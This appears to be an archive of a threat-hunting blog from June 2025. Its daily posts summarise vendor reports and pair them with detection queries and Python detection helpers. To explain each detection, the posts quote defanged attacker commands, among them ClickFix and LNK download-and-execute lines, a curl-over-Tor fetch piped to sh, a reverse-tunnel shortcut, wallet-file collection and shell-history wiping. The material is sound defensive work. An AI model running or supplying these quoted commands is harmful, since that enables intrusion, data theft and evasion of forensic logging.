Posts

Showing posts from June, 2025

181. Hunting for Mustang Panda's Claimloader

Hello everyone! As I noted yesterday, more and more threat actors are adding DLL side-loading to their arsenals. Let's look at one that has been using it for quite a long time - Mustang Panda (or Horned Werewolf, as we track it). According to this report, the adversary distributed phishing emails with Google Drive links to ZIP or RAR archives. These archives contain legitimate executables renamed to masquerade as documents (for example, 9th WPCT Region-Wise Action Plans on Tibet.exe) and malicious Claimloader DLLs. The threat actors abused the following legitimate executables: Adobe Licensing WF Helper (adobe_licensing_wf_helper.exe), Wargaming.net Game Center (helper_process.exe) and FFWallpaper Widgets Jyy (fhbjyy.exe). Of course, you already know what to do: event_type: "processcreatewin" AND ((proc_file_originalfilename: "adobe_licensing_wf_helper.exe" AND NOT proc_file_name: "adobe_licensing_wf_helper.exe") OR (proc_file_originalfilename: "helper_process.exe" AND NOT proc_file...

180. Threat Actors Abuse Legitimate Java Utility to Load Snake Keylogger

Hello everyone! Even cybercrime actors evolve their techniques and add DLL side-loading to their arsenal. Recently I spotted Snake Keylogger distributors abusing jsadebugd.exe to sideload a malicious DLL. This case is covered publicly in this report by Lab52. If we look at VirusTotal, for example, we can see that this legitimate executable was uploaded there under lots of interesting filenames. It means it's widely abused by threat actors, and it's a good idea to search for renamed copies of it: event_type: "processcreatewin" AND proc_file_originalfilename: "jsadebugd.exe" AND NOT proc_file_name: "jsadebugd.exe" See you tomorrow!

179. Hunting for Ladon

Hello everyone! Today we'll talk about a framework which is quite popular among Chinese-speaking threat actors. It's called Ladon and can be used by adversaries to solve various tasks: scanning, exploitation, remote execution, etc. It's used in-the-wild. Here are some procedure examples as seen in this report: powershell -exec bypass Import-Module .\Ladon.ps1;Ladon SweetPotato whoami powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd [IP] [User] [Password] master xp_cmdshell "net user" So, if a threat actor uses it on a compromised system, you see LOTS of interesting command line arguments, and we can use them for detection and hunting: event_type: ("processcreatewin" OR "processcreatemac" OR "processcreatenix") AND cmdline: ("ladon" OR "ms17010" OR "bypassedr" OR "whatcms" OR "draytekpoc" OR "debase64" OR "smbghost" OR "enummssql" OR ...

178. Hunting for Another Tunneler: Revsocks

Hello everyone! Tunnelers are everywhere! And this one is becoming more and more popular among threat actors: Revsocks. Let's look at how this tool is abused in-the-wild. Here's an example. The adversary abused PowerShell to create a shortcut in the Startup folder and execute revsocks: powershell -Command "$s = (New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\m4.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Microsoft\Windows\m4.exe'; $s.Arguments = '-connect hxxps://metallurgify[.]com:16443 -tls -pass 1488 -ws'; $s.WorkingDirectory = 'C:\Users\user\AppData\Local\Microsoft\Windows'; $s.Save();" So, the first hunting idea is to search for shortcut creation via PowerShell: event_type: "processcreatewin" AND proc_file_name: "powershell.exe" AND cmdline: "createshortcut" Another one - hunting for revsocks-related command line argum...

177. Hunting for SideCopy's DRAT V2

Hello everyone! Let's look at another example of leveraging the ClickFix technique. This time it's SideCopy - a sub-cluster of Transparent Tribe. Recently Recorded Future reported on a new version of DRAT - let's look at some detection and hunting opportunities. First of all, the adversary abuses mshta.exe: C:\Windows\System32\mshta.exe hxxps://trade4wealth[.]in/admin/assets/css/default/index.php It's a great candidate for hunting! For example, we can search for mshta.exe executing files from remote servers: event_type: "processcreatewin" AND proc_file_name: "mshta.exe" AND cmdline: ("http" OR "https") Next - it abuses reg.exe to establish persistence for DRAT: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Edgre" /t REG_SZ /F /D "cmd /C start C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf Here we can hunt for adding files located under %PUBLIC% to the Run key, for example: event_typ...

176. Adversaries Abuse Vercel to Deliver RATs

Hello everyone! Adversaries always experiment with the services they use for malware delivery. This time CyberArmor spotted threat actors abusing Vercel to host a malicious page. Vercel provides developer tools, frameworks, and cloud infrastructure to build and maintain websites. The adversary used it to deliver LogMeIn - another commonly abused legitimate remote access tool. So, we can hunt for access to Vercel infrastructure from uncommon hosts: event_type: "dnsreqwin" AND dns_rname: "vercel.app" Also, you can hunt for LogMeIn with uncommon file names and locations: event_type: "processcreatewin" AND proc_file_productname: "GoTo Resolve" See you tomorrow!

175. Hunting Koi Loader Installation Routine

Hello everyone! Malware installation routines are noisy. Most of the time. What does it mean? We can transform this noise into detection and hunting ideas! Let's look at Koi Loader. It's commonly delivered with the help of malicious LNK files, like this one. It executes the following command: powershell.exe -command $q7hl1gh07lmh4rm = 'ws'+'cr'+'ip' + 't ' + '%ProgramData%\' + ('nblxsl7b2fdze5.js wg3c86ft8'); & ('cu'+'r'+'l.ex'+'e') -sL -o nblxsl7b2fdze5.js 'hXXps://ayeorganization[.]com/wp-content/uploads/2019/04/goosehouseel.php'; & ('cur'+'l.e'+'xe') -s -o e8p1xhlnt1xd -L 'hXXps://ayeorganization[.]com/wp-content/uploads/2019/04/pseudophilanthropicalgjxR.php'; mv e8p1xhlnt1xd wg3c86ft8.js; . ('sc'+'hta' + 'sks') /create /sc minute /f /mo 1 /tr $q7hl1gh07lmh4rm /tn wg3c86ft8; As you can see, here we have lots of detection...
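The command above hides curl.exe, wscript and schtasks behind PowerShell string concatenation, so a plain substring search on the raw command line misses them. The following is an added example in Python (not code from the post or from the Koi Loader report) that folds ('cu'+'r'+'l.ex'+'e')-style literals back together before keyword matching. The token list and the event format are this example's own assumptions; the sample command line is the one quoted in the post.

```python
"""Normalize PowerShell string-concatenation obfuscation before keyword matching.

Added example, not code from the original post. Single-quoted PowerShell strings
have no escape sequences, so 'a'+'b' can be folded textually into 'ab', and a
parenthesised single literal ('ab') is the same as 'ab'. Repeating both folds
until the command line stops changing recovers the hidden executable names.
"""
import re

# 'ab' + 'cd'  ->  'abcd'
_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
# ( 'abcd' )   ->  'abcd'
_PARENS = re.compile(r"\(\s*'([^']*)'\s*\)")

def normalize_powershell(cmdline: str) -> str:
    """Repeatedly fold concatenations and strip parentheses until stable."""
    prev = None
    cur = cmdline
    while cur != prev:
        prev = cur
        cur = _CONCAT.sub(lambda m: f"'{m.group(1)}{m.group(2)}'", cur)
        cur = _PARENS.sub(lambda m: f"'{m.group(1)}'", cur)
    return cur

# Keywords to look for after normalization (assumed list for this example).
SUSPICIOUS_TOKENS = ("curl.exe", "wscript", "schtasks", "/sc minute")

def find_hidden_tokens(cmdline: str) -> list[str]:
    """Tokens present after normalization but absent from the raw command line,
    i.e. exactly the ones that string concatenation was hiding."""
    raw = cmdline.lower()
    norm = normalize_powershell(cmdline).lower()
    return [t for t in SUSPICIOUS_TOKENS if t in norm and t not in raw]

# Constructed sample: the Koi Loader command quoted in the post (URLs already defanged).
SAMPLE = (
    "powershell.exe -command $q7hl1gh07lmh4rm = 'ws'+'cr'+'ip' + 't ' + '%ProgramData%\\' + "
    "('nblxsl7b2fdze5.js wg3c86ft8'); & ('cu'+'r'+'l.ex'+'e') -sL -o nblxsl7b2fdze5.js "
    "'hXXps://ayeorganization[.]com/wp-content/uploads/2019/04/goosehouseel.php'; "
    "& ('cur'+'l.e'+'xe') -s -o e8p1xhlnt1xd -L "
    "'hXXps://ayeorganization[.]com/wp-content/uploads/2019/04/pseudophilanthropicalgjxR.php'; "
    "mv e8p1xhlnt1xd wg3c86ft8.js; . ('sc'+'hta' + 'sks') /create /sc minute /f /mo 1 "
    "/tr $q7hl1gh07lmh4rm /tn wg3c86ft8;"
)

if __name__ == "__main__":
    print(normalize_powershell(SAMPLE))
    print(find_hidden_tokens(SAMPLE))
```

Run the normalizer on the command line field before your keyword rules, not instead of them: "/sc minute" is already visible in the raw text and matches either way, while curl.exe, wscript and schtasks only appear after folding. Double-quoted strings, format operators and -join tricks are not handled here and need their own folds.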

174. Adversaries Abuse Python to Sideload a Backdoor

Hello everyone! We already talked about cases where adversaries abused Python to execute various scripts. But this time, according to a Knownsec report, the Confucius group used it for sideloading. The adversary leveraged malicious LNK files (yes, again and again) to download a bunch of files to the compromised system. These files included python313.dll (a backdoor researchers called Anondoor) and BlueAle.exe - a renamed copy of pythonw.exe. And yes, this is another case where we can hunt for suspiciously renamed legitimate executables: event_type: "processcreatewin" AND proc_file_originalfilename: "pythonw.exe" AND NOT proc_file_name: "pythonw.exe" Make sure to check the report for more detection ideas! See you tomorrow!
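The renamed-executable hunt used here and in posts 181 and 180 compares the OriginalFileName compiled into the PE version resource with the name the file has on disk. Below is an added example in Python (not code from the posts or from any of the vendors) that runs that comparison over constructed process-creation records. The record layout, the field names and all file paths are this example's assumptions; the OriginalFileName values are the ones the posts hunt for, and the pairing of the Tibet.exe filename with a particular host binary is constructed, not taken from the report.

```python
"""Hunt for renamed legitimate executables via PE OriginalFileName vs. on-disk name.

Added example, not code from the original posts. The vendor sets OriginalFileName
when it builds the binary; the adversary chooses the on-disk name when dropping it
next to a malicious DLL. A watched OriginalFileName with a different on-disk name
is the hunt signal the posts describe.
"""
from dataclasses import dataclass
import ntpath

@dataclass
class ProcessEvent:
    """Minimal process-creation record; field names are this example's assumption."""
    image_path: str          # full path of the started executable
    original_file_name: str  # OriginalFileName from the PE version resource ("" if absent)
    parent_image: str

# Sideloading hosts named in posts 181, 180 and 174 (lowercase OriginalFileName values).
WATCHED_ORIGINAL_NAMES = {
    "adobe_licensing_wf_helper.exe",  # Adobe Licensing WF Helper
    "helper_process.exe",             # Wargaming.net Game Center
    "fhbjyy.exe",                     # FFWallpaper Widgets Jyy
    "jsadebugd.exe",                  # Java Serviceability Agent debug daemon
    "pythonw.exe",                    # Python windowed launcher
}

def is_renamed(ev: ProcessEvent) -> bool:
    """True when the vendor name is watched and the on-disk name differs from it.
    Both sides are lower-cased: Windows file names are case-insensitive and some
    vendors store OriginalFileName in upper case."""
    orig = ev.original_file_name.strip().lower()
    if not orig or orig not in WATCHED_ORIGINAL_NAMES:
        return False
    on_disk = ntpath.basename(ev.image_path).lower()
    return on_disk != orig

def hunt(events):
    """All events whose executable was renamed away from a watched vendor name."""
    return [ev for ev in events if is_renamed(ev)]

# Constructed sample events: vendor names from the posts, paths invented for the example.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Users\user\Downloads\9th WPCT Region-Wise Action Plans on Tibet.exe",
                 "adobe_licensing_wf_helper.exe", r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Program Files\Adobe\adobe_licensing_wf_helper.exe",
                 "adobe_licensing_wf_helper.exe", r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Users\Public\BlueAle.exe", "pythonw.exe", r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Python313\pythonw.exe", "pythonw.exe", r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Users\user\AppData\Local\Temp\jsadebugd.exe", "JSADEBUGD.EXE",
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Tools\notepad.exe", "", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for ev in hunt(SAMPLE_EVENTS):
        print(f"renamed {ev.original_file_name} -> {ev.image_path}")
```

Two caveats a practitioner will hit: some legitimate installers and portable-app bundles ship renamed copies of the same binaries, so baseline before alerting, and an OriginalFileName that is missing or empty (the notepad.exe record above) is not evidence either way and is skipped rather than flagged.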

173. Adversaries Abuse Docker Remote API Servers and Tor Network

Hello everyone! We talk a lot about Windows threats, but let's look at Linux and containers today, as these are common targets of those involved in cryptominer distribution. According to this report by Trend Micro, the threat actors abused a Docker remote API server to create a new container. The following base64-encoded command was executed: apk update && apk add curl tor && tor & while ! curl -fs --proxy socks5h://localhost:9050 https://checkip [.]amazonaws.com; do sleep 10; done; curl -fs --proxy socks5h://localhost:9050 http[:]//wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad[.]onion/static/docker-init.sh | sh Despite the fact it was executed in the adversary-created container, it's good to have relevant detections. For example, abusing apk to set up Tor: event_type: "processcreatenix" AND proc_file_name: "apk" AND cmdline: ("add" AND "tor") One more thing - using cURL over Tor: event_type: "processc...

172. Another Curious ClickFix PowerShell Command

Hello everyone! I think everybody already knows about the ClickFix technique, but we still see more and more variations, especially when it comes to the command a victim is asked to paste. Proofpoint has published a report on Amatera Stealer, and the adversary leveraged the ClickFix technique to deliver it. The victim is asked to paste the following command into the Windows Run dialog: powershell -w h -c "$p=$env:TEMP+'\t.csproj';irm https://cv[.]cbrw[.]ru/t.csproj -0 $p;&($env:SystemRoot+'\Microsoft.NET\Framework\v4.0.30319\msbuild.exe') $p" The threat actors abuse PowerShell to download a malicious C# project file from a remote server, save it to the temporary directory, and execute it using msbuild.exe. So, as always, we can use suspicious command line arguments for detection, for example: event_type: "processcreatewin" AND proc_file_name: "powershell.exe" AND cmdline: (*msbuild* AND *csproj*) See you tomorrow!

171. Detecting BlueNoroff's Indicator Removal Techniques

Hello everyone! Huntress has shared the results of its analysis of a recent BlueNoroff attack involving a macOS device, a fake Zoom extension and even deepfakes! So, let's look at some detection opportunities, starting with indicator removal techniques. The adversary abused the HISTFILE environment variable: unset HISTFILE We can definitely use it for detection: event_type: "processcreatemac" AND cmdline: "unset histfile" Next behavior - clearing the in-memory shell history: history -p > /dev/null This can also be used for detection (note that unset and history are shell builtins, so they show up in the command line of the shell that runs them, e.g. zsh -c or bash -c, not as separate processes): event_type: "processcreatemac" AND cmdline: ("history -p" AND "dev/null") Finally, the threat actors remove shell history files: rm -rf ~/.zsh_history rm -rf ~/.bash_history rm -rf ~/.zsh_sessions And yes, this is another detection opportunity: event_type: "processcreatemac" AND proc_file_name: "rm" AND cmdline: (" zsh_history " OR " bash_history " OR " zsh_ses...

170. Hunting for Mocha Manakin

Hello everyone! Red Canary has colored another bird. This time the cluster is called Mocha Manakin. The adversary leverages the ClickFix technique to deliver a Node.js-based backdoor named NodeInitRAT. Researchers note that this activity has overlaps with Interlock ransomware, so it's important to detect it as early as possible. They already shared a few detection opportunities you can use, but I also suggest hunting for suspicious events related to PowerShell spawning node.exe: event_type: "processcreatewin" AND proc_p_file_path: "powershell.exe" AND proc_file_path: "node.exe" See you tomorrow!

169. Regular Stealer - Lots of Detection and Hunting Opportunities

Hello everyone! We can get threat hunting and detection ideas not only from advanced threats, but also from commodity malware. Let's look at the KimJongRAT infection chain described by Unit42. Here we're dealing with malicious LNK files one more time. The file executes the following command: "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\<USER>\AppData\Local\Temp && curl -O https://cdn[.]glitch[.]global/2eefa6a0-44ff-4979-9a9c-689be652996d/sfmw.hta?v=2 && mshta C:\Users\<USER>\AppData\Local\Temp\sfmw.hta Once again we see cURL abused to download a malicious file, this time an HTA, and mshta.exe to execute it. So, the first hunting idea is to look for cURL downloading HTA files: event_type: "processcreatewin" AND proc_file_name: "curl.exe" AND cmdline: "hta" Next thing - mshta.exe and suspicious folders: event_type: "processcreatewin" AND proc_file_name: "mshta.exe" AND cmdline: "local\...

168. Adversaries Abuse LLM to Generate Malicious Scripts

Hello everyone! I'm sure you already use LLMs to solve various security-related tasks. So do adversaries! For example, let's look at a campaign uncovered by Qianxin Threat Intelligence Center. The threat actors used Telegram to distribute archives with malicious LNK files. These files abused cURL to download a malicious .vbs file from a remote server, for example: C:\Windows\System32\cmd.exe /c "curl -o C:\Users\Public\aa.vbs https://zl-web-images[.]oss-cn-shenzhen[.]aliyuncs[.]com/5C25D918A2314DA2AC8D3C704287E278.vbs && start C:\Users\Public\aa.vbs" Here we have a nice hunting opportunity: event_type: "processcreatewin" AND proc_file_name: "curl.exe" AND cmdline: "vbs" And if we look inside the .vbs file, we can see that it's very similar to those created with LLMs! That's it! See you tomorrow!

167. Adversaries Use Weaponized GitHub Repositories to Deliver Malware

Hello everyone! Trend Micro has uncovered a new threat actor dubbed Water Curse. The adversary uses weaponized GitHub repositories to deliver multistage malware. Researchers have already identified at least 76 GitHub accounts related to this campaign. The project files contain a snippet of malicious batch code inside the <PreBuildEvent> tag, which is triggered when the project is built. MSBuild.exe spawns cmd.exe, which drops a malicious .vbs file, for example, C:\Users\[redacted]\AppData\Local\Temp\ohQ13W\XHa0aaUw9.vbs. And yes, we can use this behavior for hunting: event_type: "filecreatewin" AND proc_p_file_path: "msbuild.exe" AND proc_file_path: "cmd.exe" AND file_path: "vbs" See you tomorrow!

166. Detecting Windows Problem Reporting Abuse

Hello everyone! You can get detection and hunting ideas not only from threat actors' behaviors, but also from security researchers! For example, Adam shared an interesting case of Windows Problem Reporting (wermgr.exe) abuse. This executable has many command line arguments, and the -boot one makes it load the following DLL: C:\Windows\System32\offdmpsvc.dll. It's not present by default, so an adversary can place a payload there. It means we can use this argument for detection: event_type: "processcreatewin" AND proc_file_name: "wermgr.exe" AND cmdline: "boot" See you tomorrow!

165. FIN6 Abuses IE Per-User Initialization Utility

Hello everyone! Let's look at another curious example of the System Binary Proxy Execution (T1218) technique. DomainTools reported on a FIN6 (Skeleton Spider) campaign, which included phishing with fake resumes. The adversary distributed archives with malicious LNK files. The file executed an obfuscated command, for example: %ComSpec%" /v /c (for %l in (s) do @set "Alter=%~l") && !Alter!et "Trick=ure = " && !Alter!et "Drawings=-base" && !Alter!et "Person=version" && !Alter!et "Twist=." && !Alter!et "Involves=$win" && !Alter!et "Genius=si" && !Alter!et "Streams=d" && !Alter!et "Grass=t" && !Alter!et "Builders=c" && !Alter!et "Armor=settings" && !Alter!et "Disorder=e" && !Alter!et "Womens=ni" && !Alter!et "Cloth=a" && !Alter!et ...

164. Ransomware Gang Abuses Legitimate Employee Monitoring Software

Hello everyone! Threat actors are always adding new tools to their arsenal. This Symantec report on Fog Ransomware proves it one more time. Among other uncommon tools, the adversary leveraged Syteca - a legitimate security solution which enables recording of on-screen activity, keystroke monitoring, etc. The threat actors even used PsExec and SMBExec to execute the tool on remote systems, for example: cmd.exe /Q /c SytecaClient.exe 1> \\127.0.0.1\ADMIN$\__1748095766.8385904 2>&1 As it's a legitimate tool, it's quite easy to detect, for example: event_type: "processcreatewin" AND proc_file_productname: "syteca" See you tomorrow!

163. A Curious Case of Iediagcmd.exe Abuse

Hello everyone! Reading Check Point's report on Stealth Falcon activities, I spotted an interesting way of abusing iediagcmd.exe. The adversary uses malicious .url files whose URL parameter points to iediagcmd.exe. Normally this executable spawns additional processes to collect diagnostic data, including route.exe. The .url file sets the working directory to an attacker-controlled WebDAV server, so iediagcmd.exe runs route.exe from \\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr\route.exe (Horus Loader) instead of the legitimate one in the System32 folder. Of course, we can use it for detection and search for iediagcmd.exe executing files from WebDAV servers, for example: event_type: "processcreatewin" AND proc_p_file_path: "iediagcmd.exe" AND proc_file_path: "DavWWWRoot" See you tomorrow!
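This hunt, like the PowerShell-spawns-node.exe query in post 170 and the MSBuild-to-cmd.exe-drops-.vbs query in post 167, keys on the parent process, which raw telemetry usually does not carry on the child event. Below is an added example in Python (not code from the posts or the vendors) that rebuilds the parent link from process-creation events and then runs the three parent-keyed rules over constructed telemetry. The event shape, field names, rule names and pids are this example's assumptions; the image paths follow the posts.

```python
"""Join process-creation and file-creation telemetry into lineage-aware detections.

Added example, not code from the original posts. The three hunts (PowerShell ->
node.exe, MSBuild -> cmd.exe writing a .vbs, iediagcmd.exe -> a child loaded from
DavWWWRoot) all need the parent's image, so the detector first builds pid -> image
and pid -> parent-pid maps, then evaluates each rule against the joined view.
"""
from dataclasses import dataclass
import ntpath

@dataclass
class Event:
    kind: str                 # "processcreate" or "filecreate" (assumed schema)
    pid: int                  # the new process (processcreate) or the writing process (filecreate)
    ppid: int = 0             # parent pid, processcreate only
    image: str = ""           # image path of the new process (processcreate)
    file_path: str = ""       # path written (filecreate)

def base(path: str) -> str:
    return ntpath.basename(path).lower()

def build_lineage(events):
    """Return (pid -> image path, pid -> parent pid) from processcreate events."""
    image, parent = {}, {}
    for ev in events:
        if ev.kind == "processcreate":
            image[ev.pid] = ev.image
            parent[ev.pid] = ev.ppid
    return image, parent

def detect(events):
    """Return (rule_name, event) pairs for the three parent-keyed hunts."""
    image, parent = build_lineage(events)
    hits = []
    for ev in events:
        if ev.kind == "processcreate":
            parent_img = base(image.get(ev.ppid, ""))
            child_img = base(ev.image)
            # post 170: PowerShell spawning node.exe
            if parent_img == "powershell.exe" and child_img == "node.exe":
                hits.append(("powershell_spawns_node", ev))
            # post 163: iediagcmd.exe running a child from a WebDAV share
            if parent_img == "iediagcmd.exe" and "davwwwroot" in ev.image.lower():
                hits.append(("iediagcmd_webdav_child", ev))
        elif ev.kind == "filecreate":
            # post 167: cmd.exe whose parent is MSBuild writing a .vbs file
            writer = base(image.get(ev.pid, ""))
            grand = base(image.get(parent.get(ev.pid, -1), ""))
            if writer == "cmd.exe" and grand == "msbuild.exe" and ev.file_path.lower().endswith(".vbs"):
                hits.append(("msbuild_cmd_drops_vbs", ev))
    return hits

# Constructed telemetry: pids invented, paths follow the posts (WebDAV host defanged as in the post).
SAMPLE = [
    Event("processcreate", 100, 1, r"C:\Windows\explorer.exe"),
    Event("processcreate", 200, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    Event("processcreate", 201, 200, r"C:\Users\user\AppData\Roaming\npm\node.exe"),
    Event("processcreate", 300, 100, r"C:\Program Files\Microsoft Visual Studio\MSBuild\Current\Bin\MSBuild.exe"),
    Event("processcreate", 301, 300, r"C:\Windows\System32\cmd.exe"),
    Event("filecreate", 301, file_path=r"C:\Users\user\AppData\Local\Temp\ohQ13W\XHa0aaUw9.vbs"),
    Event("processcreate", 400, 100, r"C:\Program Files\Internet Explorer\iediagcmd.exe"),
    Event("processcreate", 401, 400, r"\\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr\route.exe"),
    Event("processcreate", 402, 400, r"C:\Windows\System32\route.exe"),   # legitimate child, no hit
    Event("filecreate", 200, file_path=r"C:\Users\user\notes.vbs"),       # PowerShell writing .vbs, no hit
]

if __name__ == "__main__":
    for rule, ev in detect(SAMPLE):
        print(rule, ev.image or ev.file_path)
```

The join is by pid, which is only safe within one boot and before pid reuse; production telemetry should join on the sensor's unique process GUID instead. Note also that the legitimate route.exe child (pid 402) produces no hit: the rule keys on the DavWWWRoot path, not on the child's name.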

162. That's How Threat Actors Steal Cryptocurrency Wallet Credentials and Seed Phrases

Hello everyone! Adversaries may have various motivations to conduct cyber attacks, but most of them are interested in getting some money, at least at some point! Kaspersky released a report on an activity cluster we track as Rare Werewolf (or Librarian Ghouls, as they call it). You can find lots of curious things to detect and hunt for in the report, but let's focus on collecting cryptocurrency wallet credentials and seed phrases (the Cyrillic wildcards below match file names containing the Russian words for password, card and wallet): %SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*парол*.* /y %SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*карт*.* /y %SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*кошельк*.* /y %SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\wallet.dat /y %SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*wallet*.doc* /y %SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYS...

161. Adversaries Leverage DNS over HTTPS (DoH) to Evade Detection

Hello everyone! Let's look at a curious example of the Protocol Tunneling technique (T1572) as seen in a recent report by SentinelOne. The adversary used a ShadowPad variant which leveraged DNS over HTTPS (DoH) in an attempt to evade detection. DoH hides DNS traffic inside HTTPS, and in a GET request the queried domain travels inside a base64url-encoded DNS message in the dns= parameter (RFC 8484), so it is not visible as plain text, for example: https://8.8.8.8:443/dns-query?dns=AAABAAABAAAAAAAABG5ld3MKaW1hZ2luZXJqcANjb20AAAEAAQ So, if you have related telemetry - you know what to hunt for! See you tomorrow!
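To hunt on DoH telemetry you have to decode the dns= parameter, because the queried name never appears as plain text in the URL. The following is an added example in Python (not code from the post or from the SentinelOne report) that restores the base64url padding, parses the DNS header and the first question, and returns the name and record type; it is run on the request quoted above. The helper names and the returned dictionary layout are this example's assumptions.

```python
"""Decode the dns= parameter of an RFC 8484 DoH GET request into the queried name.

Added example, not code from the original post. In a DoH GET the dns= value is a
complete DNS query message in wire format, base64url-encoded with the '=' padding
removed. Decoding it and walking the question section recovers the QNAME and QTYPE
that a DNS-layer hunt would normally key on.
"""
import base64
from urllib.parse import urlsplit, parse_qs

def b64url_decode(s: str) -> bytes:
    """base64url with the '=' padding restored (RFC 8484 sends it unpadded)."""
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def parse_qname(msg: bytes, offset: int = 12):
    """Read an uncompressed QNAME starting at offset; return (name, offset after it)."""
    labels = []
    while True:
        if offset >= len(msg):
            raise ValueError("truncated DNS message")
        length = msg[offset]
        offset += 1
        if length == 0:
            break
        if length & 0xC0:
            # a client-sent question never uses compression pointers
            raise ValueError("unexpected compression pointer in question")
        labels.append(msg[offset:offset + length].decode("ascii", errors="replace"))
        offset += length
    return ".".join(labels), offset

QTYPES = {1: "A", 28: "AAAA", 16: "TXT", 15: "MX", 5: "CNAME"}

def decode_doh_get(url: str) -> dict:
    """Return the DoH server, queried name, type and RD flag for a dns-query GET URL."""
    parts = urlsplit(url)
    qs = parse_qs(parts.query)
    if "dns" not in qs:
        raise ValueError("no dns= parameter; not a DoH GET request")
    msg = b64url_decode(qs["dns"][0])
    if len(msg) < 12:
        raise ValueError("DNS header too short")
    flags = int.from_bytes(msg[2:4], "big")
    qdcount = int.from_bytes(msg[4:6], "big")
    if qdcount < 1:
        raise ValueError("no question in message")
    name, off = parse_qname(msg)
    if off + 4 > len(msg):
        raise ValueError("question section truncated")
    qtype = int.from_bytes(msg[off:off + 2], "big")
    return {
        "server": parts.netloc,
        "qname": name,
        "qtype": QTYPES.get(qtype, str(qtype)),
        "recursion_desired": bool(flags & 0x0100),
    }

# The request quoted in the post; 8.8.8.8 is Google's public DoH endpoint.
SAMPLE_URL = "https://8.8.8.8:443/dns-query?dns=AAABAAABAAAAAAAABG5ld3MKaW1hZ2luZXJqcANjb20AAAEAAQ"

if __name__ == "__main__":
    print(decode_doh_get(SAMPLE_URL))
```

Feed this the URL field from your proxy or TLS-inspection logs and match the returned qname against your domain watchlists exactly as you would for regular DNS telemetry. DoH POST requests carry the same wire-format message in the request body rather than in the URL, so for those decode the body with parse_qname directly instead of going through the query string.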

160. Detecting Recent Kimsuky Campaign

Hello everyone! The Genians Security Center (GSC) reported on a recent Kimsuky (we track this activity cluster as Monolithic Werewolf) campaign, which took place between March and April 2025. Interestingly enough, the adversary leveraged multiple communication channels to distribute malicious files, including email, Facebook and Telegram. The installation process is quite noisy as always, so we have lots of detection opportunities. For example, the threat actors abused PowerShell and Certutil for decoding: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\ffBqrQ6.rppn C:\Windows\..\ProgramData\sRPCU5y.evJl A good candidate for detection, right? event_type: "processcreatewin" AND proc_file_name: "powershell.exe" AND cmdline: ("certutil" AND "decode") One more thing - abusing reg.exe to achieve persistence: reg add HKCU\Software\Microsoft\Windows\CurrentVersio...

159. Hunting for Backdoored Game Cheats

Hello everyone! Malware distribution through game cheats isn't a new phenomenon, so it's important to be able to detect related activities. Let's look into a fresh report by Unit42 on new Windows-based malware called Blitz. The malware author used social media to distribute Blitz through game cheat packages. The threat actor abused PowerShell to deliver the Blitz downloader: powershell.exe -c \"$ProgressPreference = 'SilentlyContinue'; $p=\\\"$env:LOCALAPPDATA\\Microsoft\\Internet Explorer\\ieapfltr.dll\\\"; $hu='https://pastebin.com/raw/FSzik5ew'; $du=(irm 'https://pastebin.com/raw/RzLEd17Z');if (Test-Path $p) {$eh=irm $hu;if($eh.Length -eq 64 -and $eh -match '^[a-fA-F0-9]{64}$'){$ah=(Get-FileHash $p -Algorithm SHA256).Hash;if ($eh -ne $ah) {iwr $du -OutFile $p}}}else{iwr $du -OutFile $p}\" Let's focus on Pastebin and iwr to build our hunting query: event_type: "processcreatewin" AND proc_file_name: "powe...

158. Here's How TA397 Abuses Task Scheduler

Hello everyone! Proofpoint, in collaboration with Threatray, released a report on TA397 activities. Threat researchers assess that it's a state-sponsored adversary with a focus on intelligence gathering. The threat actors actively abused Task Scheduler. A very common technique, but the command seemed interesting to me: "C:\\Windows\\System32\\conhost.exe" --headless cmd /c ping localhost > nul & schtasks /create /tn "EdgeTaskUI" /f /sc minute /mo 16 /tr "conhost --headless powershell -WindowStyle Minimized irm "woodstocktutors[.]com/jbc.php?fv=$env:COMPUTERNAME*$env:USERNAME" -OutFile "C:\\Users\\public\\kwe.cc"; Get-Content "C:\\Users\\public\\kwe.cc" | cmd" First of all, the adversary extensively uses conhost.exe in "headless" mode, and I'm sure you already have this hunt in your library: event_type: "processcreatewin" AND proc_file_name: "conhost.exe" AND cmdline: "headless...

157. Aspia: An RMM in Partisan Hands

Hello everyone! I have an addition to your hunting collection related to RMMs! Yes, I know. Yes, one more. That's life! So, Kaspersky shared a report on Cyber Partisans (we track this activity cluster as Guerrilla Hyena). Among other malware and tools, the adversary leveraged an RMM called Aspia Remote Desktop. It's interesting that this tool isn't listed in the LOLRMM project, so it's a good idea to have a hunting query for it: event_type: "processcreatewin" AND proc_file_productname: "aspia" See you tomorrow!

156. Threat Actors Abuse OpenSSH to Run a Simple Backdoor

